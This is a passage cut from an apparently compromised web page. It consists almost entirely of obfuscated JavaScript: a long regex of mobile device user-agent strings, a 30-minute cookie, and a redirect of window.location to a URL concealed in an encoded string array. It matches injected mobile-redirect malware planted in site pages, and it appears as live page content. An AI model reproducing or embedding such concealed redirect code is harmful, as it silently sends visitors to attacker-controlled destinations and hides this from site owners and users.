os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Share